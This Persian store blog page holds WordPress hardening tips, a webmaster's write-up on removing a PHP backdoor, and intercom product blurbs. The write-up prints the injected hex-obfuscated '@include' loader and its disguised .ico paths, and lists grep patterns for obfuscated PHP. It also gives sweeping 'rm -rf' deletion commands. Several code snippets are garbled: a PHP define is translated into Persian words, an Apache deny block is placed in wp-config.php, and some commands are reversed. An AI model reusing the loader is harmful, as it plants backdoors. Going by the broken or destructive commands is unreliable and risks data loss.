فروشگاه اینترنتی انتخاب کلیک

امنیت در وردپرس – رازهایی برای امنیت بیشتر در 2021

۲۹ خرداد۰۰

10 نکته برای ایجاد امنیت در وردپرس

وردپرس محبوب ترین سیستم مدیریت محتوا (CMS) است و بیش از 30 درصد وب سایت ها را قدرت می دهد. و همچنان در حال پیشرفت است، هکرها متوجه شده‌اند و شروع به هدف گیری خاص سایت های وردپرس می کنند. مهم نیست که سایت شما چه نوع محتوایی را ارائه دهد ، شما از این قاعده مستثنی نیستید. اگر اقدامات احتیاطی خاصی انجام ندهید ، ممکن است هک شوید. مانند هر فناوری مرتبط ، شما باید امنیت وب سایت خود را بررسی کنید.

در این آموزش ، ما 10 نکته مهم برای ایمن نگه داشتن وب سایت وردپرس شما را به اشتراک خواهیم گذاشت.

1- یک شرکت میزبان خوب انتخاب کنید

ساده ترین راه برای ایمن نگه داشتن سایت خود مراجعه به یک ارائه دهنده میزبانی است که چندین لایه امنیتی را فراهم می کند.

ممکن است وسوسه انگیز به نظر برسد که با یک ارائه دهنده میزبانی ارزان کار کنید ، پس از تمامی هزینه هایی که برای میزبانی وب سایت خود میکنید ، به این معنی است که می توانید آن را در جای دیگر سازمان خود خرج کنید. با این حال ، می تواند باعث کابوس های پایین آمدن سایت شود. اطلاعات شما می تواند به طور کامل پاک شود و آدرس اینترنتی شما شروع به هدایت به جای دیگری کند.

پرداخت کمی بیشتر برای یک شرکت میزبان با کیفیت به معنای آن است که لایه های امنیتی بیشتری به طور خودکار به وب سایت شما نسبت داده می شوند. یک مزیت اضافی ، با استفاده از میزبانی خوب وردپرس ، می توانید به طور قابل توجهی سرعت سایت وردپرس خود را افزایش دهید.

در حالی که شرکت های میزبان بسیاری در خارج از کشور وجود دارد ، ما WPEngine را توصیه می کنیم. آنها بسیاری از ویژگی های امنیتی ، از جمله اسکن بدافزار روزانه و دسترسی به پشتیبانی 24/7 ، 365 روز سال را فراهم می کنند.

2- از تم های رایگان و باطل شده استفاده نکنید

تم های برتر وردپرس حرفه ای تر به نظر می رسند و گزینه های قابل تنظیم بیشتری نسبت به تم رایگان دارند. اما می توان استدلال کرد شما آنچه را که برای آن پرداخت می کنید می گیرید. تم های برتر توسط توسعه دهندگان بسیار ماهر کدگذاری می شوند و آزمایش می شوند تا بدون هیچ خطایی برای استفاده آماده شوند. در مورد شخصی سازی موضوع خود محدودیتی وجود ندارد و اگر مشکلی در سایت شما رخ دهد از پشتیبانی کامل برخوردار خواهید شد. بیشتر از همه به روزرسانی های منظم تم را دریافت خواهید کرد.

اما ، چند سایت وجود دارد که مضامین خنثی یا کرک شده را ارائه می دهند. یک تم پوچ یا کرک شده نسخه هک شده از یک تم برتر است که از طریق روش های غیرقانونی در دسترس است. آنها همچنین برای سایت شما بسیار خطرناک هستند. این مضامین حاوی کدهای مخرب مخفی هستند ، که می توانند وب سایت و پایگاه داده شما را از بین ببرند.

اگرچه ممکن است صرفه جویی در هزینه ها کمی وسوسه انگیز باشد ، اما همیشه از موضوعات باطل شده و رایگان خودداری کنید.

3- یک افزونه امنیتی در وردپرس نصب کنید

بررسی مرتب امنیت وب سایت از نظر بدافزار کاری زمان بر است مگر اینکه به طور منظم دانش خود را در مورد روش های کدگذاری به روز کنید ، حتی ممکن است متوجه نشوید که به یک بدافزار نوشته شده در کد نگاه می کنید. خوشبختانه افراد دیگر دریافته اند که همه افراد توسعه دهنده نیستند و پلاگین های امنیتی وردپرس را برای کمک به آنها قرار داده اند. یک افزونه امنیتی از امنیت سایت شما مراقبت می کند ، بدافزار را اسکن می کند و 24/7 سایت شما را کنترل می کند تا به طور منظم اتفاقات سایت شما را بررسی کند.

Sucuri یک پلاگین امنیتی عالی وردپرس است. آنها ممیزی فعالیت های امنیتی ، نظارت بر یکپارچگی پرونده ، اسکن بدافزار از راه دور ، نظارت بر لیست سیاه ، تقویت امنیت موثر ، اقدامات امنیتی پس از هک ، اعلان های امنیتی و حتی فایروال وب سایت (برای حق بیمه) را ارائه می دهند.

4- از گذرواژه قوی استفاده کنید

رمزهای عبور بخش مهمی از امنیت وب سایت هستند و متأسفانه اغلب نادیده گرفته می شوند. اگر از یک گذرواژه ساده یعنی «123456 ، abc123» استفاده می‌کنید ، باید سریعاً گذرواژه خود را تغییر دهید. اگرچه به خاطر سپردن این گذرواژه آسان است اما حدس زدن آن نیز بسیار آسان است. کاربر پیشرفته می تواند به راحتی رمز ورود شما را شکسته و بدون دردسر زیادی وارد آن شود.

مهم این است که شما از یک رمز عبور پیچیده یا بهتر از آن از رمز عبوری که با انواع مختلفی از اعداد ، ترکیب حروف مزخرف و علامت های خاص مانند٪ یا ^ به صورت خودکار تولید می شود استفاده کنید.

5- ویرایش فایل ها را غیرفعال کنید

هنگامی که در حال راه اندازی سایت وردپرس خود هستید ، یک عملکرد ویرایشگر کد در داشبورد شما وجود دارد که به شما امکان می دهد تم و پلاگین خود را ویرایش کنید. با رفتن به Appearance> Editor می توانید به آن دسترسی پیدا کنید. روش دیگر برای یافتن ویرایشگر پلاگین مراجعه به بخش Plugins> Editor است.

وقتی سایت شما فعال شد ، توصیه می کنیم این ویژگی را غیرفعال کنید. اگر هکرهایی به پنل مدیریت وردپرس شما دسترسی پیدا کنند ، می توانند کدهای مخرب ظریف را به سایت و پلاگین شما تزریق کنند. اغلب اوقات کد به قدری ظریف خواهد بود که ممکن است متوجه نشوید.

برای غیرفعال کردن امکان ویرایش پلاگین ها و فایل های تم ، کافی است کد زیر را در فایل wp-config.php خود وارد کنید.

تعریف (“DISALLOW_FILE_EDIT” ، درست است)؛

wordpress -theme - www.entekhabclick.com

6- گواهی SSL را نصب کنید

امروزه لایه تک سوکت ها ، SSL ، برای انواع وب سایت ها مفید است. در ابتدا SSL برای ایجاد امنیت سایتی در معاملات خاص مانند پردازش پرداخت مورد نیاز بود. امروزه ، با این وجود ، گوگل اهمیت آن را تشخیص داده و به سایت های دارای گواهینامه SSL مکانی با وزن بیشتر در نتایج جستجوی خود ارائه می دهد.

SSL برای هر سایتی که اطلاعات حساس ، مانند رمزهای عبور ، یا جزئیات کارت اعتباری را پردازش می کنند ، اجباری است. بدون گواهی SSL ، تمام داده های بین مرورگر کاربر و سرور شما به صورت متن ساده ارائه می شود. این توسط هکرها قابل خواندن است. با استفاده از SSL ، اطلاعات حساس قبل از انتقال بین مرورگر و سرور شما رمزگذاری می شوند ، که خواندن آن را دشوارتر می کند و امنیت سایت شما را بیشتر می کند.

برای وب سایت هایی که اطلاعات حساس را می پذیرند ، متوسط قیمت SSL در حدود 500 تا 800 هزار در سال است. اگر اطلاعات حساس را قبول نمی کنید ، نیازی به پرداخت هزینه گواهی SSL ندارید. تقریباً هر شرکت میزبانی یک گواهینامه Let’s Encrypt SSL رایگان را ارائه می دهد که می توانید آن را در سایت خود نصب کنید.

7- آدرس ورود به سیستم WP خود را تغییر دهید

به طور پیش فرض ، برای ورود به وردپرس آدرس “Yourite.com/wp-admin” است. با ترک آن به عنوان پیش فرض ، ممکن است شما برای یک حمله بی رحمانه هدف قرار بگیرید تا ترکیبی از نام کاربری / رمز عبور خود باشد. اگر کاربران را برای ثبت نام در حساب های اشتراک بپذیرید ، ممکن است تعداد زیادی هرزنامه نیز ثبت نام کنید. برای جلوگیری از این ، می توانید URL ورود به سیستم مدیر را تغییر دهید یا یک سوال امنیتی به صفحه ثبت نام و ورود به سیستم اضافه کنید.

نکته حرفه ای: با افزودن یک افزونه احراز هویت 2 عاملی به وردپرس می توانید از صفحه ورود خود بیشتر محافظت کنید. هنگام ورود به سیستم ، برای دسترسی به سایت خود باید احراز هویت اضافی ارائه دهید – به عنوان مثال ، این می تواند رمز ورود و ایمیل شما (یا متن) باشد. این یک ویژگی امنیتی پیشرفته برای جلوگیری از دسترسی هکرها به سایت شما است.

نکته حرفه ای 2: همچنین می توانید بررسی کنید کدام IP ها بیشترین تلاش برای ورود به سیستم را داشته اند ، سپس می توانید آن آدرس های IP را مسدود کنید.

8- تلاشهای ورود به سیستم را محدود کنید

به طور پیش فرض ، وردپرس به کاربران اجازه می دهد تا هر زمان که بخواهند وارد سیستم شوند. این ممکن است به شما کمک کند ، اما در عین حال سایت شما را در برابر حملات بی رحمانه باز می کند.

با محدود کردن تعداد ورود به سیستم ، کاربران می توانند تعداد محدودی ورود را امتحان کنند تا اینکه به طور موقت مسدود شوند. قبل از اینکه هکر قفل شود ، شانس شما برای تلاش برای بی رحمی را محدود می کند.

شما می توانید این کار را به راحتی با یک افزونه وردپرس ورود به سیستم محدود کنید. پس از نصب افزونه ، می توانید تعداد تلاشهای ورود به سیستم را از طریق تنظیمات> تلاش های محدود به سیستم (Settings> Login Limit Attempts) وارد کنید. اگر می خواهید ورود به سیستم بدون پلاگین را فعال کنید ، می توانید این کار را نیز انجام دهید.

limit login attemp - www.entekhabclick.com

9- فایل های wp-config.php و .htaccess را مخفی کنید

اگرچه این یک فرآیند پیشرفته برای بهبود امنیت سایت شما است ، اما اگر در مورد امنیت خود جدی هستید ، کتمان فایل های .htaccess و wp-config.php سایت برای جلوگیری از دسترسی هکرها به آنها ، یک روش مفید است.

ما اکیداً توصیه می کنیم این گزینه توسط توسعه دهندگان باتجربه اجرا شود ، زیرا ضروری است ابتدا از سایت خود نسخه پشتیبان تهیه کرده و سپس با احتیاط ادامه دهید. هر اشتباهی ممکن است سایت شما را از دسترس خارج کند.

برای پنهان کردن فایل ها ، پس از پشتیبان گیری ، دو کار وجود دارد که باید انجام دهید:

ابتدا به فایل wp-config.php خود بروید و کد زیر را اضافه کنید ،

<Files wp-config.php>
order allow,deny
deny from all
</Files>

در یک روش مشابه ، کد زیر را به فایل .htaccess اضافه می کنید ،

<Files .htaccess>
order allow,deny
deny from all
</Files>

اگرچه روند کار بسیار آسان است ، اما در صورت بروز هرگونه مشکل در روند کار ، اطمینان حاصل کنید که از نسخه پشتیبان تهیه می کنید.

10- نسخه وردپرس خود را به روز کنید

به روز نگه داشتن وردپرس خود یک روش خوب برای ایمن نگه داشتن وب سایت خود است. با هر به روزرسانی ، توسعه دهندگان چند تغییر ایجاد می کنند ، اغلب اوقات ، از جمله به روزرسانی ویژگی های امنیتی. با به روز بودن در مورد آخرین نسخه ، به محافظت از خود در برابر هدف قرار داشتن خلأهای از پیش تعیین شده و سو استفاده هایی که هکرها می توانند برای دسترسی به سایت خود استفاده کنند ، کمک می کنید.

به همین دلایل مهم است که پلاگین ها و مضامین خود را نیز به روز کنید.

به طور پیش فرض ، وردپرس به طور خودکار به روزرسانی های جزئی را بارگیری می کند. با این حال ، برای به روزرسانی های مهم ، باید آن را مستقیماً از داشبورد مدیریت وردپرس خود به روز کنید.

wordpress dashboard - www.entekhabclick.com

نتیجه گیری

امنیت وردپرس یکی از قسمتهای مهم یک وب سایت است. اگر امنیت در وردپرس خود را حفظ نکنید ، هکرها می توانند به راحتی به سایت شما حمله کنند. حفظ امنیت وب سایت شما کار سختی نیست و می توان آن را بدون صرف هیچ هزینه ای انجام داد. پس سعی کنید تمام مواردی که در بالا ذکر کردیم را انجام دهید تا امنیت سایت شما بالا برود

۰ نظر

رویا زرد

هک فایل ico. و index.php و تبدیل شدن به index.html.bak.bak

۲۹ خرداد۰۰

هک فایل دروپال ico. و index.php و تبدیل شدن به index.html.bak.bak

من سه وب سایت دارم که همه در یک سرور وب میزبانی می شوند. اخیراً در یکی از وب سایت ها کار می کردم و متوجه شدم ، حدود یک ماه پیش ، دسته ای از فایل ها تغییر کرده است. به طور خاص ، همه موارد index.html به index.html.bak.bak تغییر نام داده شده و فایل های index.php در مکان های خود قرار داده شده اند. فایل های index.php نسبتاً ساده هستند. آنها شامل فایلی هستند که در جایی از سیستم هر وب سایت مخفی شده اند (به ظاهر یک پوشه تصادفی) که با کدگذاری JS hex مبهم شده اند ، سپس index.html را چاپ میکنند.

php?>

/*2d4f2*/

@include “\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f”

/*2d4f2*/

;echo file_get_contents(‘index.html.bak.bak’)

فایل موجود در اینجا کد زیر هست

/mnt/*snip*/www.website.com/web/content/wp-includes/js/swfupload/favicon_291372.ico

در یک دامنه دیگر ، کد زیر بود

/mnt/*snip*/www.website2.com/web/content/wiki/maintenance/hiphop/favicon_249bed.ico

همانطور که احتمالاً حدس می زنید ، اینها در واقع موارد خوبی نیستند – آنها فقط فایلهای php با پسوند دیگری هستند.

هرچه بیشتر پیش میروم به نظر می رسد فایلهای PHP گیج کننده بیشتری وجود دارد که کاملاً ترسناک است. تعداد زیادی از آنها وجود دارد. به نظر می رسد حتی فایل های index.php وردپرس نیز آلوده شده اند. علاوه بر این ، در یکی از وب سایت ها ، فایلی با عنوان “ssh” وجود دارد که به نظر می رسد نوعی فایل باینری باشد (شاید خود برنامه “ssh” باشد؟)

حالا آیا کسی می داند اینها چیست یا چه کاری انجام می دهند؟ چگونه آنها وارد سرور من شدند؟ چگونه می توانم از شر آنها خلاص شوم و مطمئن شوم که هرگز برنخواهند گشت؟

من این مشکلات را در جایی مطرح کردم و جواب های جالبی را دریافت کردم. در ادامه تعدادی از آنها را با هم ببینیم:

جواب اول

در حال حاضر نمی توانید به چیزی در سرور اعتماد کنید.

سیستم عامل را دوباره نصب کنید

نسخه های خوب شناخته شده کد خود را با یک نسخه تمیز یا خوب شناخته شده از پایگاه داده دوباره نصب کنید.

در این مرحله فقط جایگزینی یا حذف فایل های “بد” فایده ای ندارد زیرا مهاجم می توانست کاملاً از “هیچ چیز” تا جایگزینی نرم افزار سطح سیستم با نسخه های هک شده که هر کار دلخواه را انجام می دهد ، انجام دهد. به عنوان مثال ، در یک زمان کسی بدافزار را در یک کامپایلر مینویسد بنابراین حتی اگر مورد اجرایی دوباره ساخته شود ، بدافزار هنوز در آنجا خواهد بود ، همچنین از شناسایی آن توسط اشکالزدایی جلوگیری میکند.

پاک کننده های مختلفی در دسترس است ، اما آنها به دانستن / شناسایی / خنثی سازی هر کاری که ممکن است مهاجم انجام داده باشد متکی هستند ، که این غیر ممکن است.

اگر پشتیبان گیری روزانه خوبی داشته باشید ، می توانید بین “آنچه دارید” و “آنچه قبلا داشته اید” تفاوت ایجاد کنید و ببینید چه چیزی تغییر کرده است ، با این حال هنوز هم باید پایگاه داده خود را به دقت بررسی یا بازیابی کنید زیرا بسیاری از حملات شامل تغییر داده ها هستند ، نه کد

جواب دوم

من همین بدافزار را داشتم. 10 تا 15 فایل وجود دارد که بدافزار اضافه یا اصلاح می کند. من از پلاگین Quttera WordPress (رایگان) برای یافتن فایل ها استفاده کردم. بیشتر فایل ها فقط می توانند حذف شوند (مراقب باشید ، شناسه های Quttera بیش از پیش میتوانند آلوده شوند) اما برخی از فایل های وردپرس تغییر پیدا کرده اند و باید جایگزین شوند.

جواب سوم

این نمونه هک مشکل بزرگی نیست که شما سایت و سرور خود را پاک کنید. این فقط یک هک پی اچ پی است. از شر تمام فایل ها و کد های مخرب php خلاص شوید و میبینید که به حالت قبل برمیگردد.

جواب چهارم

من هنوز راهی پیدا نکردم که چطور از نمایش این فایل ها در سرور جلوگیری کنم؟ اما می تونم با قطعه کد زیر از شرشون خلاص شم ، در اینجا یک خط کد قرار دادم که دونه دونه پوشه ها رو به پایین پیمایش میکنه و اونها رو از بین می بره:

find . -type f -name ‘favicon_*.ico’ -delete -print

جواب پنجم

آیا از فایل های قبل از آلوده شدن نسخه پشتیبان تهیه کردید؟ بهترین کار اینه که از سرور استفاده نکنید و همه چیز را دوباره بازنشانی کنید. شما نمیدونید چه فایل های دیگری نیز می تواند آلوده شده باشند ، بنابراین منطقی نیست که سعی کنید چیزی را که اتفاق افتاده را جبران کنید و فایل های دیگر را به خطر بیندازید ، فقط از ابتدا شروع کنید.

خب جواب ها رو دیدیم حالا بریم ببینیم که من چطور بر این مشکل فائق اومدم.

من معتقدم که بالاخره در این حمله برتری داشتم. از آنچه من بصورت آنلاین می خوانم ، این بخشی از سوء استفاده های ابزاری بود. من به اندازه کافی سریع نبودم. مردم ادعا می کنند شما باید سایتها و سرورهای خود را از این بابت حذف کنید. حاضر به انجام این کار نیستم. اگر دسترسی ریشه WHM ندارید ، نمی توانید این حمله را پاک کنید.

این هک با چند مورد مشخص می شود:

حساب های سرپرستی که ایجاد نکرده اید.
نقش هایی که شما در نمایش خود ایجاد نکردید.
فایل های مخرب “ico” که با کد PHP در سرور ظاهر می شوند.
فایل های php تصادفی در لیست فایل های سایت نشان داده می شوند.
تعداد زیادی فایل اضافی “index.php” در سراسر سایت نشان داده می شود.
فایل های php و inc که با کد مبهم اصلاح شده اند.
عفونت های متقابل سایت در WHM مشترک. فایل های آلوده در پوشه home / cpeasyapache.

بعضی ها معتقدند در جایی که هکرها وارد آن می شوند “درهای پشتی” میباشد. من به این مسئله شک کردم زیرا حساب های مدیر مخرب پشتیبان گیری نمی شدند. آنچه اتفاق می افتاد این بود که فایل های “ico” هر 5 – 10 ساعت در حال ظهور بودند ، و اینها به نوبه خود یک دسته از فایل های رشته ای تصادفی php و فایل های index.php ایجاد می کردند که به فایل ico باز می گشتند. به نظر می رسید این کد می تواند بر چندین سایت مشترک WHM یکسان تأثیر بگذارد.

مراحل رفع هک بدون پاک کردن سایت خود:

از سایت و پایگاه داده خود پشتیبان تهیه کنید ، سایت را در حالت تعمیر و نگهداری قرار دهید.
اطمینان حاصل کنید که به SSH به WHM یا Cpanel دسترسی دارید.
وارد سایت شوید و هرگونه حساب کاربری مخرب را حذف کنید.

4- هر نقشی را که اضافه نکردید حذف کنید.

5- از cpanel ، با استفاده از phpmyadmin ، به جداول پایگاه داده خود برای کاربران و نقش ها نگاه کنید ، جداولی را که می دانید نباید وجود داشته باشند ، حذف کنید. (کاربر 0 قرار است آنجا باشد).

تمام گذرواژه های پایگاه داده و کاربران را تغییر دهید.

از قسمت SSH وارد پوشه public_html شوید و دستور زیر را اجرا کنید:

find -name index.php

اگر می بینید که یک فایل شلوغ در دروپال ظاهر می شود ، شما هک شده اید. قرار است فقط یک فایل index.php وجود داشته باشد.

تمام فایل های index.php را با این دستور پاک کنید:

;\ {} find -name index.php -exec rm -rf

هنگام بروزرسانی جدیدترین دروپال ، فایل اصلی index.php را جایگزین خواهیم کرد.

فایل های آیکونی را با این دستور جستجو کنید.

“find -name “*.ico

اگر با یک دسته از فایلهای آیکونی با پسوند عجیب و غریب که با a شروع می شوند. و دارای یک رشته تصادفی هستند، آنها فایلهای php هستند. من همه فایل های آیکونی را با دستور زیر حذف کردم:

;\ {} find -name “*.ico” -exec rm -rf

اگر می خواهید فایل های آیکونی خود را حفظ کنید ، فقط موارد مشکوک را با ftp به صورت دستی حذف کنید.

من میبینم که فایلهایی غیر از ico. نیز وجود داشتند که با این هک همراه بودند. راهی آسان برای شناسایی اینکه از کدام پسوند استفاده می کنند باز کردن یکی از فایل های index.php هک شده و متن زیر را کپی کنید:

@include “\057h\157m\145/\147l\145n\143c\057p\165b\154i\143_\150t\155l\057p\162o\146i\154e\163/\164e\163t\151n\147/\0564\0621\142e\071a\067.\151c\157”;

و در یک سایت رمزگشا قرار بدید.

این به شما می گوید که به کدام فایل مخرب اشاره شده است. از این اطلاعات برای حذف همه فایل های آن نوع با استفاده از دستور SSH که در بالا گفته شد، اما برای پسوند مخرب به جای .ico استفاده کنید.

سایر فایل های مخرب php را که متعلق نیستند پیدا کنید. در سایت من ، همه آنها فایلهای php با 8 کاراکتر a-z بودند. مانند dkelfesa.php یا موارد دیگر. با استفاده از این regex به دنبال 8 کاراکتر php باشید:

‘find . -type f | egrep ‘./[a-z]{8}\.php

هرگونه فایل مشکوک را حذف کنید. به طور معمول نام آنها بی معنا است. اگر آنها را باز کنید و یک مشت کد PHP را ببینید که نمی توانید بخوانید ، قطعا آنها مخرب هستند.

بعد از انجام همه اینها ، من همچنان هک می شدم و نمی توانستم آن را کشف کنم. من تصمیم گرفتم پایگاه داده خود را برای سایت در phpMyAdmin باز کنم و جستجو در تمام جداول را برای:

php?>

هر کد php مخربی که از دست داده ام انجام دهم. به نظر می رسد که وقتی هک اصلی اتفاق افتاد ، هکر از حساب مدیر برای ایجاد بلوکی به نام “توسعه” استفاده کرده بود. او هیچ عنوانی به آن نداد و در بدنه کد php مخرب خود را وارد کرد. سپس این مورد را در سایت فعال کرد. او می تواند از راه دور با آن تماس بگیرد و این سایت با فایل های ico ، فایل های index.php و رشته های تصادفی php مجدداً سایت را ویرایش می کند. یک جستجوی پایگاه داده را برای برچسب php در بالا اجرا کنید و تمام نتایج مربوط به کد مخرب را در سایت خود در گره های محتوا یا بلوک بررسی کنید. کدی را که نمی توانید به راحتی بخوانید حذف کنید.

همچنین تعداد زیادی فایل php و inc در سراسر نصب دروپال وجود داشت که یا با php مخرب در بالای فایل اصلاح شده بودند یا فقط متعلق به آن نبودند. آنها هوشمندانه نامگذاری شدند و به پوشه های ماژول ، پوشه های کتابخانه ، در همه جا منتقل شدند. همانطور که آنها را کشف کردم ، این گریپ ها را ایجاد کردم تا به دیگران کمک کنم آنها را پیدا کنند. متأسفانه من 4 فایل مخرب در فهرست / home / cpeasyapache پیدا کردم. به نظر می رسید که اینها توانایی اسکن همه سایت ها را در میزبان مشترک و آلوده کردن همه آنها دارند. برای جستجوی فایلهای مخرب php و inc از این جستجوها در سطح ریشه WHM استفاده کنید. آنها را بردارید یا تمیز کنید.

“* find . -type f -name ‘*.php’ | xargs grep -l ” *=PHP_VERSION
“* ()find . -type f -name ‘*.php’ | xargs grep -l ” *Phar::interceptFileFuncs
“* find . -type f -name ‘*.php’ | xargs grep -l ” *@include
“* find . -type f -name ‘*.php’ | xargs grep -l ” *interceptFileFuncs
“* (*find . -type f -name ‘*.php’ | xargs grep -l ” *eval *( *gzinflate *( *base64_decode
“* find . -type f -name ‘*.php’ | xargs grep -l ” *base64_decode
“* find . -type f -name ‘*.php’ | xargs grep -l ” *function *wscandir
“* find . -type f -name ‘*.php’ | xargs grep -l ” *HTTP/1.0 *404 *Not *Found
“* find . -type f -name ‘*.php’ | xargs grep -l ” *@gzuncompress
“* find . -type f -name ‘*.php’ | xargs grep -l ” *Array *( *) *; *global
“* find . -type f -name ‘*.php’ | xargs grep -l ” *@unserialize

اگر به ریشه سایت خود دسترسی ندارید ، با ارائه دهنده میزبان خود تماس بگیرید تا از طریق الگوهای بالا اسکن کند تا فایل های مخرب حذف شود.

در اینجا مثالی از کد مخرب موجود در فایلی در فهرست / cpeasyapachy از ریشه WHM آورده شده است:

فایل کامل دارای برخی توابع بود که اسکن ریشه ، به دنبال فایل های inc و php ، تغییر مجوز پوشه و ایجاد فایل های index.php بود. 4 فایل در فهرست cpeasyapache وجود داشت که شبیه این بود:

برای دیدن کد کامل اینجا کلیک کنید.

در پایان:

همین که این کار را کردید آخرین نسخه دروپال را بارگیری کرده و در سایت خود کپی کنید. این جایگزین فایل اصلی index.php می شود و سایت شما باید دوباره فعال شود.

آخرین ماژول ها را نصب کنید.

update.php را اجرا کنید.

در آخر ، تنظیمات مجوز فایل را در پوشه public_html بررسی کنید. دایرکتوری ها باید روی 740 و فایل ها روی 644 تنظیم شوند. یک راه سریع برای انجام این کار:

;\ {} find . -type d -exec chmod 740

;\ {} find . -type f -exec chmod 644

پس از پایان کار ، ماژول “Hacked” را نصب کنید تا سایت خود را از نظر تغییرات مرتبط با این هک بررسی کنید.

سایر ماژول های خوب ، امنیت ورود به سیستم و path2ban هستند.

تمام حافظه پنهان سایت و تاریخچه مرورگر وب / حافظه پنهان را پاک کنید.

حالا از سایت خود لذت ببرید.

امیدوارم این آموزش برای شما مفید واقع شده باشه. چون این مشکل برای خودم پیش آمده بود و هیچ منبعی نبود که به من کمک کند این مشکل را حل کنم تصمیم گرفتم که کارهایی که خودم انجام دادم رو باهاتون به اشتراک بذارم تا شاید بتواند به شخص دیگری کمک کند.

چنانچه نظر و یا راه حلی دارید با ما به اشتراک بذارید تا شاید کمکی باشد برای دیگران.

https://entekhabclick.com/hack-file-ico-va-index-php-dar-website/

۰ نظر

رویا زرد

پنل آیفون تصویری اف‌ اف مدل 4CA

۲۹ خرداد۰۰

پنل آیفون تصویری اف‌ اف مدل 4CA

کمپانی اف اف از شرکت های تولیدی محصولات سیستمهای اتوماتیک پارکینگی و در بازکن های تصویری میباشد که از سال 1373 فعالیت خود را آغاز کرد و تا کنون توانسته محصولات بسیاری با کیفیت عالی تولید نماید.

این محصولات بدست متخصصان ایرانی در داخل کشور ساخته شده و با گارانتی 24 ماهه عرضه میشود و پس از پایان گارانتی تا 12 سال خدمات پس از فروش ارائه میدهد.

پنل آیفون تصویری اف‌ اف مدل 4CA از محصولات این شرکت میباشد که در ادامه به بررسی مشخصات و قابلیت های آن میپردازیم.

مشخصات پنل آیفون تصویری اف‌ اف مدل 4CA

دارای دوربین هوشمند رنگی با کیفیت بالا.
لنز 1/3 اینچ بهمراه 6 عدد ال ای دی مادون قرمز.
امکان دید در شب تا فاصله یک متر.
پنل آلومینیومی ضد رطوبت، ضد خش و مقاوم در برابر نور خورشید.
زاویه دید وسیع.
انتقال تصویر با کیفیت بالا.
قابلیت تنظیم زاویه دید دوربین.
مجهز به دزدگیر.
پخش صدای با کیفیت.

طراحی ظاهری و بدنه

این محصول با قابی مستطیل شکل و رنگی نقره ای ظاهری متفاوت را به نمایش گذاشته است. در بالا و پایین پنل جای دو عدد پیچ مشاهده میشود که برای نصب استفاده میشود.

در بالای پنل لوگوی FF Technology و لنز چراغ های ال ای دی که با فضای مشکی رنگ نشان داده شده است قابل مشاهده میباشد.

یک بلند گو پر قدرت با صدایی واضح در زیر لنز پنل قرار دارد که در زیر آن نیز شاسی زنگ تعبیه شده تا مراجعه کنندگان با فاصله کمی صدای افراد را از پنل شنیده و دسترسی راحتی به شاسی زنگ داشته باشند.

خصوصیات فنی پنل 4CA

از مهمترین خصوصیات این محصول میتوان به لنز دید در شب آن اشاره کرد که لنز به کار رفته از نوع 1/3 اینچی میباشد و با کمک 6 عدد ال ای دی مادون قرمز در تاریکی شب تا شعاع یک متر اجسام قابل مشاهده میباشند.

بلندگو تعبیه شده با استفاده از یک آهنربا پر قدرت صدای شفاف با کیفیت بالا را به مراجعه کننده انتقال میدهد.

تکنولوژی بکار رفته در این محصول با بهره گیری از استاندارد مقاومتی در صورت در قرارگیری در شرایط نا مساعد آب و هوایی و گرد و غبار باعث شده تا این محصول با اختلال مواجه نشده و حتی در شرایط بد هم بدرستی کار کند.

ضمانت قیمت و ضمانت اصالت کالا

پنل آیفون تصویری اف‌ اف مدل 4CA را با مناسب ترین قیمت و کیفیت قابل توجه تنها از فروشگاه اینترنتی انتخاب کلیک تهیه نمایید.

گارانتی معتبر و قابل اعتماد امری مهم در خرید لوازم صنعتی و خانگی بشمار می رود که مجموعه انتخاب کلیک با عنایت به ضرورت این موضوع، پنل آیفون تصویری اف‌ اف مدل 4CA را با ضمانت نامه معتبر شرکتی به مشتریان خود عرضه می کند.

فروشگاه اینترنتی انتخاب کلیک علاوه بر ضمانت نامه رسمی برای خدمات به مشتریان، با داشتن فروشگاه های زنجیره ای حقیقی و با 25 سال سابقه ی درخشان در بازار لوازم خانگی و صنعتی ایران، مفتخر است ضمن تضمین اصالت تمامی کالاها، نوید بخش خرید اینترنتی لذت بخش برای هموطنان عزیز باشد.

۰ نظر

رویا زرد

آیفون تصویری اف اف مدل P70M

۲۹ خرداد۰۰

آیفون تصویری اف اف 7 اینچ با حافظه - P70M

آیفون تصویری اف اف مدل P70M از محصولات این شرکت میباشد که در ادامه به بررسی مشخصات و قابلیت های آن میپردازیم.

مشخصات فنی آیفون تصویری اف اف مدل P70M

نمایشگر

این محصول دارای صفحه نمایش 7 اینچی می باشد که با در نظر گرفتن سایز صفحه میتواند گزینه مناسبی برای مکان هایی با فضای بزرگ باشد و در دسته آیفون های بزرگ قرار می گیرد.

قابلیت ذخیره سازی فیلم و عکس

آیفون تصویری اف اف مدل P70M نسبت به مدل قدیمی خود P70 که قابلیت ذخیره سازی را نداشت از ذخیره سازی عکس پشتیبانی می کند و حرف m به معنی memory یا همان قابلیت ذخیره سازی میباشد که در مدل های جدید میتوان این قابلیت را مشاهده کرد.

از امکانات خوبی که این قابلیت دارد در نبود شما تصاویر اشخاصی که به آپارتمان شما مراجعه میکنند تصویر برداری میکند و شما بعدا میتوانید آنها را بررسی کنید. و در مسائل امنیتی میتواند بسیار کارآمد باشد.

مشخصات آیفون تصویری اف اف مدل P70M

دارای صفحه نمایش 7 اینچی رنگی.
طریقه نصب آسان بصورت روکار.
جنس بدنه پلاستیکی.
قابلیت ذخیره تصاویر توسط حافظه داخلی.

رنگ

این محصول با رنگ سفید به بازار عرضه شده است و امکان دارد که در آینده رنگ های دیگر این محصول به بازار عرضه شوند.

گارانتی

تمامی محصولات کمپانی اف اف تکنولوژی با 24 ماه ضمانت و 12 سال خدمات پس از فروش عرضه میشوند.

ضمانت قیمت و ضمانت اصالت کالا

آیفون تصویری اف اف مدل P70M را با مناسب ترین قیمت و کیفیت قابل توجه تنها از فروشگاه اینترنتی انتخاب کلیک تهیه نمایید.

گارانتی معتبر و قابل اعتماد امری مهم در خرید لوازم صنعتی و خانگی بشمار می رود که مجموعه انتخاب کلیک با عنایت به ضرورت این موضوع، آیفون تصویری اف اف مدل P70M را با ضمانت نامه معتبر شرکتی به مشتریان خود عرضه می کند.

۰ نظر

رویا زرد

عنوان دومین مطلب آزمایشی من

۱۳ خرداد۰۰

